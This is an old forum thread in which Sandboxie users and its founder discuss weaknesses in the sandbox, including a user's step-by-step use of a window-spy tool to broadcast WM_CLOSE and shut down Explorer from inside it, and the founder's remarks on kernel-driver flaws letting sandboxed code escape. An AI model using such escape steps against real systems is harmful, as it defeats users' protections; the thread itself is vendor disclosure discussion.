vunerability

If it doesn't fit elsewhere, it goes here
Post Reply
street011
Posts: 412
Joined: Tue Jan 16, 2007 2:08 pm

Post by street011 » Mon Jan 22, 2007 4:31 am

i ran spy in sandboxie,
i just selected the 'explorer' window with the crosshair,
went to the misc tab,
selected HWND_BROADCAST / WM_CLOSE / HEX ==> SEND

then everything shuts kinda down :p

luckily windows asked me HOW i wanted to shutdown :p
Top
tzuk
Sandboxie Founder
Sandboxie Founder
Posts: 16076
Joined: Tue Jun 22, 2004 12:57 pm

Post by tzuk » Mon Jan 22, 2007 7:05 pm

Okay. To sum this up, you're right, the principle of the matter is that there may be holes in Sandboxie at this time, and if malware knows about these holes, it can abuse these at this time.

My objection was only to the unequivocal claim that there will always be holes that can be taken advantage of. I was trying to say that holes can be closed, and in the long term, I believe Sandboxie can be made bullet-proof.

As for this particular hole: While it would be preferable that a sandboxed program not be able to shut down your Explorer, this hole does not put your system at risk of sustaining permanent damage that comes from within the sandbox.

And even this will be improved in future versions.
tzuk
Top
OwenBurnett
Posts: 112
Joined: Mon Dec 18, 2006 11:36 am

Post by OwenBurnett » Wed Jan 24, 2007 1:39 pm

@street011
cool, thats the CLOSE thing how to do the code injection thing?
It works also wiet the 2.76 beta

@tzuk
Can we expect this to be fixed in the next beta release?

Owen
Top
Unknown_User_596
Posts: 0
Joined: Wed Dec 31, 1969 7:00 pm

Post by Unknown_User_596 » Wed Jan 24, 2007 2:15 pm

tzuk wrote:TI'm just surprised at some people jumping to conclusions. For instance:
... there are a lot of other ways to get to the system level! Without going into details to much ...
Oh, I wish you would go into that detail. Otherwise you're just saying "there are other attack vectors ... I think! ... But anyway I'm not telling" which is just . . . puzzling.
After investing a few hours today I have to say it is not easy to get an attack vector for sandboxie. (In fact I did not find any up and running break out possibility by now) My first thought in the last quote was not to educate anyone about possible weakness of sandboxie. So I did not want to include possible methods for attacks. But after my tests today I assume all the more simple approaches will not work because sandboxie has some history … => as I understand a open discussion on attacks will help more.

One “possibleâ€
Top
tzuk
Sandboxie Founder
Sandboxie Founder
Posts: 16076
Joined: Tue Jun 22, 2004 12:57 pm

Post by tzuk » Sat Jan 27, 2007 6:35 pm

[quote]One “possibleâ€
tzuk
Top
tzuk
Sandboxie Founder
Sandboxie Founder
Posts: 16076
Joined: Tue Jun 22, 2004 12:57 pm

Post by tzuk » Mon Jan 29, 2007 4:44 pm

I want to add another reservation here.

It's possible for a system to contain kernel mode code containing unknown vulnerabities. For example, third-party hardware drivers may not handle some data properly, and this could allow their abuse in a way that lets an application gain access to kernel mode.

For example: This link (pdf) describes abusing a firewall to gain kernel mode access. (The particular firewall was fixed, but the principle remains.)

The abusive application could even be sandboxed, but if it can abuse a system component to gain kernel mode access, then the application can easily bypass Sandboxie and any other system protection tool.

My earlier statement:
I wrote:. . . holes can be closed, and in the long term, I believe Sandboxie can be made bullet-proof.
While technically correct, Sandboxie is just one of a large number of kernel mode components, and, in principle (but not necessarily in practice), each one of these components may be abused by an application to gain full access in the system.
tzuk
Top
Post Reply

Return to “Anything Else”

Who is online

Users browsing this forum: No registered users and 1 guest